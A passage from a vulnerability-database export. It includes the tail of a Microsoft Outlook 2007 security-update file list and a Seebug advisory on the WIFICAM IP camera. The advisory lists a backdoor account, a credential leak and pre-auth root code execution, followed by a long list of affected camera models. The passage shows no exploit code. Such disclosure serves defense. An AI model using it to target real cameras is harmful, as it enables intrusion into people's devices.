applicable</td></tr><tr><td>9825</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>99.ico</td><td>Not applicable</td><td>1,406</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Arrowd.gif</td><td>Not applicable</td><td>51</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Arrowr.gif</td><td>Not applicable</td><td>54</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Cal.css</td><td>Not applicable</td><td>2,807</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Certificate</td><td>Not 
applicable</td><td>16,088</td><td>08-Jul-2017</td><td>07:13</td><td>Not applicable</td></tr><tr><td>Gap.gif</td><td>Not applicable</td><td>44</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Idb_bitmap_explor.bmp</td><td>Not applicable</td><td>230</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Idb_resultsega.bmp</td><td>Not applicable</td><td>3,562</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Idb_resultshiresvga.bmp</td><td>Not applicable</td><td>8,400</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Idb_resultsvga.bmp</td><td>Not applicable</td><td>4,722</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Idd_generalmail</td><td>Not applicable</td><td>932</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Idr_mreqitem</td><td>Not applicable</td><td>568</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Interconnect_bizcard.xsl</td><td>Not applicable</td><td>15,687</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Issuereportingform.htm</td><td>Not applicable</td><td>13,948</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Lincoln.jpg</td><td>Not applicable</td><td>22,988</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Madewith.gif</td><td>Not applicable</td><td>569</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Mail_zoom1d.bmp</td><td>Not applicable</td><td>358</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Mail_zoom1f.bmp</td><td>Not applicable</td><td>358</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Mail_zoom1u.bmp</td><td>Not applicable</td><td>358</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Monthl.gif</td><td>Not applicable</td><td>67</td><td>18-Jan-2018</td><td>06:15</td><td>Not 
applicable</td></tr><tr><td>Monthr.gif</td><td>Not applicable</td><td>67</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Morebmp.gif</td><td>Not applicable</td><td>854</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Move2.avi</td><td>Not applicable</td><td>18,433</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Paycal_busy.gif</td><td>Not applicable</td><td>847</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Paycal_free.gif</td><td>Not applicable</td><td>847</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Paycal_html.xsl</td><td>Not applicable</td><td>71,200</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Paycal_line_datepick.gif</td><td>Not applicable</td><td>892</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Paycal_line_datepick_ellipsis.gif</td><td>Not applicable</td><td>949</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Paycal_line_event_separator.gif</td><td>Not applicable</td><td>949</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Paycal_line_outer_thick.gif</td><td>Not applicable</td><td>958</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Paycal_line_outer_thin.gif</td><td>Not applicable</td><td>949</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Paycal_oof.gif</td><td>Not applicable</td><td>847</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Paycal_oowh.gif</td><td>Not applicable</td><td>847</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Paycal_tent.gif</td><td>Not applicable</td><td>864</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Paycal_uparrow.gif</td><td>Not applicable</td><td>65</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>Scanpst_bitmap.bmp</td><td>Not 
applicable</td><td>630</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>Welcome.htm</td><td>Not applicable</td><td>3,892</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr></tbody></table><h2></h2><h3>How to get help and support for this security update</h3><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr> <td faq-panel-body=\"\"> Help for installing updates: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/help/12373/windows-update-faq\" managed-link=\"\" target=\"\">Windows Update FAQ</a><br/><br/> Security solutions for IT professionals: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/security/bb980617.aspx\" managed-link=\"\" target=\"\">Security Support and Troubleshooting</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" managed-link=\"\" target=\"\">Microsoft Secure</a><br/><br/> Local support according to your country: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com\" managed-link=\"\" target=\"\">International Support</a></td></tr></tbody></table></body></html>", "edition": 4, "modified": "2020-04-16T08:56:34", "id": "KB4011200", "href": "https://support.microsoft.com/en-us/help/4011200/", "published": "2018-02-13T00:00:00", "title": "Description of the security update for Outlook 2007: February 13, 2018", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T12:01:14", "description": "## Product Description\r\n\r\nThe Wireless IP Camera (P2P) WIFICAM is a Chinese web camera which allows to stream remotely.\r\n\r\n\r\n\r\n## Vulnerabilities Summary\r\n\r\nThe Wireless IP Camera (P2) WIFICAM is a camera 
overall badly designed with a lot of vulnerabilities. This camera is very similar to a lot of other Chinese cameras.\r\n\r\nIt seems that a generic camera is being sold in bulk (OEM) by a Chinese company, and the buyer companies resell it with custom software development and specific branding. Wireless IP Camera (P2) WIFICAM is one of the branded cameras.\r\n\r\nAs a result, the cameras are sold under different names and brands and with different functions. The HTTP interface is different for each vendor but shares the same vulnerabilities.\r\n\r\nBecause of code reuse, the vulnerabilities are present in a huge list of cameras (especially the InfoLeak and the RCE), **which allow root commands to be executed against 1250+ camera models with a pre-auth vulnerability**.\r\n\r\nThe summary of the vulnerabilities is:\r\n\r\n1. [CVE-2017-8224 - Backdoor account](#backdoor-account)\r\n2. [CVE-2017-8222 - RSA key and certificates](#rsa-lulz)\r\n3. [CVE-2017-8225 - Pre-Auth Info Leak (credentials) within the custom http server](#pre-auth-info-leak-goahead)\r\n4. [Authenticated RCE as root](#root-rce)\r\n5. [Pre-Auth RCE as root](#pre-auth-root-rce)\r\n6. [CVE-2017-8223 - Misc - Streaming without authentication](#open-streaming)\r\n7. [CVE-2017-8221 - Misc - \"Cloud\" (Aka Botnet)](#cloud)\r\n\r\n**The vulnerabilities in the Cloud management affect a lot of P2P or \"Cloud\" cameras.**\r\n\r\n**My tests have shown that the InfoLeak affecting the GoAhead server running on the camera affects at least 1250+ camera models. It can be used to execute the RCE as root. 
Thus, these cameras are likely affected by a pre-auth RCE as root:**\r\n\r\n```\r\n3G+IPCam Other\r\n3SVISION Other\r\n3com CASA\r\n3com Other\r\n3xLogic Other\r\n3xLogic Radio\r\n4UCAM Other\r\n4XEM Other\r\n555 Other\r\n7Links 3677\r\n7Links 3677-675\r\n7Links 3720-675\r\n7Links 3720-919\r\n7Links IP-Cam-in\r\n7Links IP-Wi-Fi\r\n7Links IPC-760HD\r\n7Links IPC-770HD\r\n7Links Incam\r\n7Links Other\r\n7Links PX-3615-675\r\n7Links PX-3671-675\r\n7Links PX-3720-675\r\n7Links PX3309\r\n7Links PX3615\r\n7Links ipc-720\r\n7Links px-3675\r\n7Links px-3719-675\r\n7Links px-3720-675\r\nA4Tech Other\r\nABS Other\r\nADT RC8021W\r\nAGUILERA AQUILERA\r\nAJT AJT-019129-BBCEF\r\nALinking ALC\r\nALinking Other\r\nALinking dax\r\nAMC Other\r\nANRAN ip180\r\nAPKLINK Other\r\nAQUILA AV-IPE03\r\nAQUILA AV-IPE04\r\nAVACOM 5060\r\nAVACOM 5980\r\nAVACOM H5060W\r\nAVACOM NEW\r\nAVACOM Other\r\nAVACOM h5060w\r\nAVACOM h5080w\r\nAcromedia IN-010\r\nAcromedia Other\r\nAdvance Other\r\nAdvanced+home lc-1140\r\nAeoss J6358\r\nAetos 400w\r\nAgasio A500W\r\nAgasio A502W\r\nAgasio A512\r\nAgasio A533W\r\nAgasio A602W\r\nAgasio A603W\r\nAgasio Other\r\nAirLink Other\r\nAirmobi HSC321\r\nAirsight Other\r\nAirsight X10\r\nAirsight X34A\r\nAirsight X36A\r\nAirsight XC39A\r\nAirsight XX34A\r\nAirsight XX36A\r\nAirsight XX40A\r\nAirsight XX60A\r\nAirsight x10\r\nAirsight x10Airsight\r\nAirsight xc36a\r\nAirsight xc49a\r\nAirsight xx39A\r\nAirsight xx40a\r\nAirsight xx49a\r\nAirsight xx51A\r\nAirsight xx51a\r\nAirsight xx52a\r\nAirsight xx59a\r\nAirsight xx60a\r\nAkai AK7400\r\nAkai SP-T03WP\r\nAlecto 150\r\nAlecto Atheros\r\nAlecto DVC-125IP\r\nAlecto DVC-150-IP\r\nAlecto DVC-1601\r\nAlecto DVC-215IP\r\nAlecto DVC-255-IP\r\nAlecto dv150\r\nAlecto dvc-150ip\r\nAlfa 0002HD\r\nAlfa Other\r\nAllnet 2213\r\nAllnet ALL2212\r\nAllnet ALL2213\r\nAmovision Other\r\nAndroid+IP+cam IPwebcam\r\nAnjiel ip-sd-sh13d\r\nApexis AH9063CW\r\nApexis APM-H803-WS\r\nApexis APM-H804-WS\r\nApexis APM-J011\r\nApexis 
APM-J011-Richard\r\nApexis APM-J011-WS\r\nApexis APM-J012\r\nApexis APM-J012-WS\r\nApexis APM-J0233\r\nApexis APM-J8015-WS\r\nApexis GENERIC\r\nApexis H\r\nApexis HD\r\nApexis J\r\nApexis Other\r\nApexis PIPCAM8\r\nApexis Pyle\r\nApexis XF-IP49\r\nApexis apexis\r\nApexis apm-\r\nApexis dealextreme\r\nAquila+Vizion Other\r\nArea51 Other\r\nArmorView Other\r\nAsagio A622W\r\nAsagio Other\r\nAsgari 720U\r\nAsgari Other\r\nAsgari PTG2\r\nAsgari UIR-G2\r\nAtheros ar9285\r\nAvantGarde SUMPPLE\r\nAxis 1054\r\nAxis 241S\r\nB-Qtech Other\r\nB-Series B-1\r\nBRAUN HD-560\r\nBRAUN HD505\r\nBeaulieu Other\r\nBionics Other\r\nBionics ROBOCAM\r\nBionics Robocam\r\nBionics T6892WP\r\nBionics t6892wp\r\nBlack+Label B2601\r\nBravolink Other\r\nBreno Other\r\nCDR+king APM-J011-WS\r\nCDR+king Other\r\nCDR+king SEC-015-C\r\nCDR+king SEC-016-NE\r\nCDR+king SEC-028-NE\r\nCDR+king SEC-029-NE\r\nCDR+king SEC-039-NE\r\nCDR+king sec-016-ne\r\nCDXX Other\r\nCDXXcamera Any\r\nCP+PLUS CP-EPK-HC10L1\r\nCPTCAM Other\r\nCamscam JWEV-372869-BCBAB\r\nCasa Other\r\nCengiz Other\r\nChinavasion Gunnie\r\nChinavasion H30\r\nChinavasion IP611W\r\nChinavasion Other\r\nChinavasion ip609aw\r\nChinavasion ip611w\r\nCloud MV1\r\nCloud Other\r\nCnM IP103\r\nCnM Other\r\nCnM sec-ip-cam\r\nCompro NC150/420/500\r\nComtac CS2\r\nComtac CS9267\r\nConceptronic CIPCAM720PTIWL\r\nConceptronic cipcamptiwl\r\nCybernova Other\r\nCybernova WIP604\r\nCybernova WIP604MW\r\nD-Link DCS-910\r\nD-Link DCS-930L\r\nD-Link L-series\r\nD-Link Other\r\nDB+Power 003arfu\r\nDB+Power DBPOWER\r\nDB+Power ERIK\r\nDB+Power HC-WV06\r\nDB+Power HD011P\r\nDB+Power HD012P\r\nDB+Power HD015P\r\nDB+Power L-615W\r\nDB+Power LA040\r\nDB+Power Other\r\nDB+Power Other2\r\nDB+Power VA-033K\r\nDB+Power VA0038K\r\nDB+Power VA003K+\r\nDB+Power VA0044_M\r\nDB+Power VA033K\r\nDB+Power VA033K+\r\nDB+Power VA035K\r\nDB+Power VA036K\r\nDB+Power VA038\r\nDB+Power VA038k\r\nDB+Power VA039K\r\nDB+Power VA039K-Test\r\nDB+Power VA040\r\nDB+Power 
VA390k\r\nDB+Power b\r\nDB+Power b-series\r\nDB+Power extcams\r\nDB+Power eye\r\nDB+Power kiskFirstCam\r\nDB+Power va033k\r\nDB+Power va039k\r\nDB+Power wifi\r\nDBB IP607W\r\nDEVICECLIENTQ CNB\r\nDKSEG Other\r\nDNT CamDoo\r\nDVR DVR\r\nDVS-IP-CAM Other\r\nDVS-IP-CAM Outdoor/IR\r\nDagro DAGRO-003368-JLWYX\r\nDagro Other\r\nDericam H216W\r\nDericam H502W\r\nDericam M01W\r\nDericam M2/6/8\r\nDericam M502W\r\nDericam M601W\r\nDericam M801W\r\nDericam Other\r\nDigix Other\r\nDigoo BB-M2\r\nDigoo MM==BB-M2\r\nDigoo bb-m2\r\nDinon 8673\r\nDinon 8675\r\nDinon SEGEV-105\r\nDinon segev-103\r\nDome Other\r\nDrilling+machines Other\r\nE-Lock 1000\r\nENSIDIO IP102W\r\nEOpen Open730\r\nEST ES-IP602IW\r\nEST IP743W\r\nEST Other\r\nEZCam EPK-EP10L1\r\nEZCam EZCam\r\nEZCam Other\r\nEZCam PAN/TILT\r\nEZCam Pan/Tilt\r\nEasyCam EC-101HD\r\nEasyCam EC-101HDSD\r\nEasyCam EC-101SD\r\nEasyCam EC-102\r\nEasyCam Other\r\nEasyN 187\r\nEasyN 1BF\r\nEasyN 720P\r\nEasyN F\r\nEasyN F-136\r\nEasyN F-M136\r\nEasyN F-M166\r\nEasyN F-M181\r\nEasyN F-M1b1\r\nEasyN F-SERIES\r\nEasyN F133\r\nEasyN F2-611B\r\nEasyN F3\r\nEasyN F3-166\r\nEasyN F3-176M\r\nEasyN F3-M166\r\nEasyN F3-SERIES\r\nEasyN F3-Series\r\nEasyN F3-m187\r\nEasyN F3M187\r\nEasyN FS-613A-M136\r\nEasyN FS-613B\r\nEasyN FS-613B-M166\r\nEasyN FS-613B-MJPEG\r\nEasyN FS613\r\nEasyN F_M10R\r\nEasyN H3-V10R\r\nEasyN H6-M137h\r\nEasyN M091\r\nEasyN Other\r\nEasyN est-007660-611b\r\nEasyN est-007660333\r\nEasyN f\r\nEasyN f-Series\r\nEasyN f138\r\nEasyN f_series\r\nEasyN fseries\r\nEasyN kitch\r\nEasyN s\r\nEasySE F/B/N/I\r\nEasySE H3\r\nEasySE H3e\r\nEasySE Other\r\nEbode IPV38W\r\nEbode IPV58\r\nEbode Other\r\nEgo Other\r\nElro 901\r\nElro 903\r\nElro 903IP\r\nElro C7031P\r\nElro C703IP2\r\nElro C704-IP\r\nElro C704IP\r\nElro C704IP.2\r\nElro C704ip\r\nElro C803IP\r\nElro C903IP\r\nElro C903IP.2\r\nElro C904IP\r\nElro C904IP.2\r\nElro IP901\r\nElro Other\r\nEminent 6564\r\nEminent EM6220\r\nEminent EM6564\r\nEminent em6220\r\nEsky C5900\r\nEsky 
L\r\nEsky Live\r\nEsky c5900\r\nEura-Tech IC-03C3\r\nEyeCam ICAM-608\r\nEyeCam IP65IW\r\nEyeCam Other\r\nEyeCam STORAGEOPTIONS\r\nEyeIPCam IP901W\r\nEyeSight ES-IP607W\r\nEyeSight ES-IP811W\r\nEyeSight ES-IP909IW\r\nEyeSight ES-IP935FW\r\nEyeSight ES-IP935IW\r\nEyeSight IP910IW\r\nEyeSight IP915IW\r\nEyeSight Other\r\nEyeSight ip609IW\r\nEyeSight ip909iw\r\nEyeSight ip915iw\r\nEyeSight mjpeg\r\nEyeSpy247 Other\r\nF-Series FSERIES\r\nF-Series Ip\r\nF-Series Other\r\nF-Series ip\r\nFirst+Concept Other\r\nFocuscam F19821W\r\nFoscam FI18904w\r\nFoscam FI18905E\r\nFoscam FI18905W\r\nFoscam FI18906w\r\nFoscam FI1890W\r\nFoscam FI18910E\r\nFoscam FI18910W\r\nFoscam FI18910w\r\nFoscam FI18916W\r\nFoscam FI18918W\r\nFoscam FI18919W\r\nFoscam FI19810W\r\nFoscam FI8094W\r\nFoscam FI81904W\r\nFoscam FI8601W\r\nFoscam FI8602W\r\nFoscam FI8606W\r\nFoscam FI8610w\r\nFoscam FI8903W\r\nFoscam FI8903W_Elita\r\nFoscam FI8904\r\nFoscam FI8904W\r\nFoscam FI8905E\r\nFoscam FI8905W\r\nFoscam FI8905w\r\nFoscam FI8906w\r\nFoscam FI8907W\r\nFoscam FI8908W\r\nFoscam FI8909W\r\nFoscam FI890W\r\nFoscam FI8910\r\nFoscam FI8910E\r\nFoscam FI8910W\r\nFoscam FI8910W_DW\r\nFoscam FI8910w\r\nFoscam FI8916W\r\nFoscam FI8918\r\nFoscam FI89180w\r\nFoscam FI8918E\r\nFoscam FI8918W\r\nFoscam FI8918w\r\nFoscam FI8919W\r\nFoscam FI9804W\r\nFoscam FI9805E\r\nFoscam FI9810\r\nFoscam FI9810W\r\nFoscam FI9818\r\nFoscam FI9820w\r\nFoscam FI9821W\r\nFoscam FI9821w\r\nFoscam FL8910\r\nFoscam FS18908W\r\nFoscam FS8910\r\nFoscam Fi8910\r\nFoscam Other\r\nFoscam fI8989w\r\nFoscam fi1890w\r\nFoscam fl8910w\r\nFoxCam PTZ2084-L\r\nGIGA gb\r\nGT+ROAD HS-006344-SPSLM\r\nGeneral Other\r\nGeneric All-in-one\r\nGeneric Billy\r\nGeneric DomeA-Outdoor\r\nGeneric IP\r\nGeneric Other\r\nGi-star+srl IP6031W\r\nGigaeye GB\r\nGoAhead EC-101SD\r\nGoAhead GoAheadWebs\r\nGoAhead IPCAM1\r\nGoAhead IPCAM2\r\nGoAhead Other\r\nGoAhead thedon\r\nGoCam Other\r\nGoclever EYE\r\nGoclever EYE2\r\nGotake GTK-TH01B\r\nH+264+network+DVR 
720p\r\nH+264+network+DVR Other\r\nH.264 Other\r\nH6837WI Other\r\nHD+IPC Other\r\nHD+IPC SV3C\r\nHDIPCAM Other\r\nHeden CAMH04IPWE\r\nHeden CAMHED02IPW\r\nHeden CAMHED04IP\r\nHeden CAMHED04IPWN\r\nHeden CAMHEDIPWP\r\nHeden Other\r\nHeden VisionCam\r\nHeden visionCam\r\nHiSilicon Other\r\nHikvision DS-2CD2132\r\nHistream RTSP\r\nHooToo F-SERIES\r\nHooToo HOOTOO\r\nHooToo HT-IP006\r\nHooToo HT-IP006N\r\nHooToo HT-IP009HDP\r\nHooToo HT-IP206\r\nHooToo HT-IP207F\r\nHooToo HT-IP210HDP\r\nHooToo HT-IP210P\r\nHooToo HT-IP212\r\nHooToo IP009HDP\r\nHooToo Other\r\nHooToo apm-h803-mpc\r\nHsmartlink Other\r\nHungtek WIFI\r\nICAMView Other\r\nICam I908W\r\nICam IP-1\r\nICam Other\r\nICam Other2\r\nICam dome\r\nINISOFT-CAM Stan\r\nINSTAR 4010\r\nINVID Other\r\nIO+Data Other\r\nIP66 Other\r\nIPC IPC02\r\nIPC Other\r\nIPC S5030-TF\r\nIPC S5030-m\r\nIPC SRICAM\r\nIPCC 3XPTZ\r\nIPCC 7210W\r\nIPCC IPCC-7210W\r\nIPCC x01\r\nIPTeles Other\r\nIPUX ip-100\r\nISIT Other\r\nIZOtech Other\r\nIZTOUCH 0009\r\nIZTOUCH A001\r\nIZTOUCH IZ-009\r\nIZTOUCH LTH-A8645-c15\r\nIZTOUCH Other\r\nIZTOUCH Other1\r\nIZTOUCH ap001\r\nIeGeek Other\r\nIeGeek ukn\r\nInkovideo V-104\r\nIprobot3 Other\r\nJRECam JM3866W\r\nJWcam JWEV\r\nJWcam Other\r\nJaycar 3834\r\nJaycar 720P\r\nJaycar Other\r\nJaycar QC-3831\r\nJaycar QC-3832\r\nJaycar QC-3834\r\nJaycar QC-3836\r\nJaycar QC-3839\r\nJaytech IP6021W\r\nJhempCAM Back\r\nJhempCAM Other\r\nKaiKong 1601\r\nKaiKong 1602w\r\nKaiKong Other\r\nKaiKong SIP\r\nKaiKong SIP1602\r\nKaiKong SIP1602W\r\nKaiKong sip\r\nKaiKong sip1602w\r\nKenton gjc02\r\nKinson C720PWIP\r\nKlok Other\r\nKnewmart KW01B\r\nKnewmart KW02B\r\nKogan KAIPC01BLKA\r\nKogan KAIPCO1BLKA\r\nKogan Other\r\nKogan encoder\r\nKogan kaipc01blkb\r\nKompernass IUK\r\nKoolertron Other\r\nKoolertron PnP\r\nKoolertron SP-SHEX21-SL\r\nLC+security Other\r\nLW lw-h264tf\r\nLYD H1385H\r\nLager Other\r\nLeadtek C351\r\nLevelOne 1010/2010\r\nLibor Other\r\nLifeTech MyLifeTech\r\nLifeTech Other\r\nLifeTech dd\r\nLilly 
Other\r\nLinq Other\r\nLloyds 1107\r\nLoftek CXS\r\nLoftek Nexus\r\nLoftek Other\r\nLoftek SPECTOR\r\nLoftek Sendinel\r\nLoftek Sentinel\r\nLogiLink WC0030A\r\nLogiLink wc0044\r\nLogitech C920\r\nMCL 610\r\nMJPEG Other\r\nMaginon 100\r\nMaginon 10AC\r\nMaginon 20C\r\nMaginon IP-20c\r\nMaginon IPC\r\nMaginon IPC-1\r\nMaginon IPC-10\r\nMaginon IPC-100\r\nMaginon IPC-100AC\r\nMaginon IPC-10AC\r\nMaginon IPC-2\r\nMaginon IPC-20\r\nMaginon IPC20C\r\nMaginon IPC_1A\r\nMaginon Other\r\nMaginon SUPRA\r\nMaginon Supra\r\nMaginon ipc\r\nMaginon ipc-1a\r\nMaginon ipc100a\r\nMaginon ipx\r\nMaginon w2\r\nMarmitek GM-8126\r\nMaygion IP\r\nMaygion OTHER2\r\nMaygion Other\r\nMaygion V3\r\nMaygion black\r\nMediatech mt4050\r\nMedisana SmartBabyMonitor\r\nMerlin IP\r\nMerlin Other\r\nMerlin vstc\r\nMessoa Other\r\nMingyoushi S6203Y-WR\r\nMomentum 2002\r\nMomentum MO-CAM\r\nNEXCOM S-CAM\r\nNIP NIP-004500-KMTLU\r\nNIP NIP-075007-UPHTF\r\nNIP NIP-11BGPW\r\nNIP NIP-14\r\nNTSE Other\r\nNeewer Other\r\nNeewer V-100\r\nNeo+CoolCam NIP\r\nNeo+CoolCam NIP-02(OAM)\r\nNeo+CoolCam NIP-06\r\nNeo+CoolCam NIP-066777-BWESL\r\nNeo+CoolCam NIP-102428-DFBEF\r\nNeo+CoolCam NIP-H20(OZX)\r\nNeo+CoolCam OBJ-007260-LYLDU\r\nNeo+CoolCam Other\r\nNeo+CoolCam neo\r\nNeo+CoolCam nip-11\r\nNeo+CoolCam nip-20\r\nNess Other\r\nNetView Other\r\nNetcam Dual-HD\r\nNetcam HSL-232245-CWXES\r\nNetcam OUVIS\r\nNetcam Other\r\nNetware Other\r\nNexxt+Solution Xpy\r\nNixzen Other\r\nNorthQ NQ-9006\r\nOffice+One CM-I11123BK\r\nOffice+One IP-900\r\nOffice+One IP-99\r\nOffice+One Other\r\nOffice+One SC-10IP\r\nOffice+One ip-900\r\nOffice+One ip900\r\nOpexia OPCS\r\nOptica+Video FI-8903W\r\nOptica+Video FI-8918W\r\nOptica+Video Other\r\nOtto 4eye\r\nOvermax CamSpot\r\nOvermax Camspot\r\nOwlCam CP-6M201W\r\nP2p wificam\r\nPCS Other\r\nPanasonic BL-C131A\r\nPeopleFu IPC-674\r\nPeopleFu IPCAM1\r\nPeopleFu IPCAM2\r\nPeopleFu IPCAM3\r\nPeopleFu IPCAM5\r\nPixpo 1Z074A2A0301627785\r\nPixpo PIX006428BFYZY\r\nPixpo 
PIX009491MLJYM\r\nPixpo PIX009495HURFE\r\nPixpo PIX010584DFACE\r\nPlaisio IP\r\nPlanex Other\r\nPlanex PLANEX\r\nPolariod P351S\r\nPolaroid IP-100\r\nPolaroid IP-101W\r\nPolaroid IP-200B\r\nPolaroid IP-201B\r\nPolaroid IP-350\r\nPolaroid IP-351S\r\nPolaroid IP-360S\r\nPolaroid IP-810W\r\nPolaroid IP-810WZ\r\nPolaroid Other\r\nPolaroid POLIP101W\r\nPolaroid POLIP201B\r\nPolaroid POLIP201W\r\nPolaroid POLIP351S\r\nPolaroid POLIP35i5\r\nPowerLead Caue\r\nPowerLead PC012\r\nProveCam IP2521\r\nProvision 717\r\nProvision F-717\r\nProvision F-737\r\nProvision PT-737\r\nProvision WP-711\r\nProvision WP-717P\r\nPyle HD\r\nPyle HD22\r\nPyle HD46\r\nPyle Mine\r\nPyle PIPCAM15\r\nPyle Pipcam12\r\nPyle cam5\r\nPyle pipcam25\r\nPyle pipcam5\r\nQ-nest QN-100S\r\nQ-nest qn-100s\r\nQueback 720p\r\nROCAM NC-400\r\nROCAM NC-500\r\nROCAM NC300\r\nROCAM NC300-1\r\nROHS IP\r\nROHS none\r\nRTX 06R\r\nRTX DVS\r\nRTX IP-06R\r\nRTX IP-26H\r\nRTX Other\r\nRollei safetycam-10hd\r\nSES Other\r\nSKJM Other\r\nSST SST-CNS-BUI18\r\nSVB+International SIP-018262-RYERR\r\nSafeHome 278042\r\nSafeHome 616-W\r\nSafeHome IP601W-hd\r\nSafeHome Other\r\nSafeHome VGA\r\nSafeHome iprobot\r\nSamsung Other\r\nSantec-Video Other\r\nSarotech IPCAM-1000\r\nSarotech ip300\r\nScricam 004\r\nScricam 192.168.1.7\r\nScricam AP-004\r\nScricam AP-009\r\nScricam AP0006\r\nScricam AP006\r\nSecam+CCTV IPCAM\r\nSecam+CCTV Other\r\nSeculink 10709\r\nSeculink Other\r\nSecur+Eye xxc5330\r\nSeisa JK-H616WS\r\nSenao PTZ-01H\r\nSequrecam Other\r\nSequrecam PNP-125\r\nSercomm Other\r\nShenwhen+Neo+Electronic+Co NC-541\r\nShenwhen+Neo+Electronic+Co Other\r\nShenwhen+Neo+Electronic+Co X-5000B\r\nShenzhen 720P\r\nShixin+China IP-129HW\r\nSiepem IPC\r\nSiepem S5001Y-BW\r\nSiepem S6203y\r\nSiepem S6211Y-WR\r\nSimi+IP+Camera+Viewer Other\r\nSineoji Other\r\nSineoji PT-315V\r\nSineoji PT-3215P\r\nSineoji PT-325IP\r\nSinocam Other\r\nSky+Genious Genious\r\nSkytronic IP\r\nSkytronic IP99\r\nSkytronic Other\r\nSkytronic WiFi\r\nSkytronic 
dome\r\nSmartEye Other\r\nSmartWares C723IP\r\nSmartWares c724ip\r\nSmartWares c923ip\r\nSmartWares c924ip\r\nSolwise SEC-1002W-IR\r\nSpy+Cameras WF-100PCX\r\nSpy+Cameras WF-110V\r\nSricam 0001\r\nSricam 004\r\nSricam A0009\r\nSricam A001\r\nSricam AP-001\r\nSricam AP-003\r\nSricam AP-004\r\nSricam AP-005\r\nSricam AP-006\r\nSricam AP-009\r\nSricam AP-012\r\nSricam AP-CAM\r\nSricam AP0009\r\nSricam AP002\r\nSricam AP995\r\nSricam Cam1\r\nSricam Front\r\nSricam Home\r\nSricam Other\r\nSricam SP005\r\nSricam SP012\r\nSricam SP013\r\nSricam SP015\r\nSricam SRICAM\r\nSricam SRICAM1\r\nSricam aj-c2wa-c118\r\nSricam ap\r\nSricam ap006\r\nSricam ap1\r\nSricam h.264\r\nSricam sp013\r\nSricctv A-0006\r\nSricctv A-009\r\nSricctv AJ-006\r\nSricctv AP-0001\r\nSricctv AP-0005\r\nSricctv AP-0009\r\nSricctv AP-001\r\nSricctv AP-002\r\nSricctv AP-003\r\nSricctv AP-004\r\nSricctv AP-004AF\r\nSricctv AP-005\r\nSricctv AP-006\r\nSricctv AP-007\r\nSricctv AP-008\r\nSricctv AP-009\r\nSricctv AP-011\r\nSricctv AP-014\r\nSricctv H-264\r\nSricctv Other\r\nSricctv P2P-BLACK\r\nSricctv P2P-Black\r\nSricctv SP-007\r\nSricctv SR-001\r\nSricctv SR-004\r\nStar+Vedia 6836\r\nStar+Vedia 7837-WIP\r\nStar+Vedia C-7835WIP\r\nStar+Vedia Other\r\nStar+Vedia T-6836WTP\r\nStar+Vedia T-7833WIP\r\nStar+Vedia T-7837WIP\r\nStar+Vedia T-7838WIP\r\nStarCam C33-X4\r\nStarCam EY4\r\nStarCam F6836W\r\nStarCam Other\r\nStarCam c7837wip\r\nStipelectronics Other\r\nStorage+Options HOMEGUARD\r\nStorage+Options Other\r\nStorage+Options SON-IPC1\r\nSumpple 610\r\nSumpple 610S\r\nSumpple 631\r\nSumpple 960P\r\nSumpple S601\r\nSumpple S610\r\nSumpple S631\r\nSumpple S651\r\nSumpple qd300\r\nSumpple 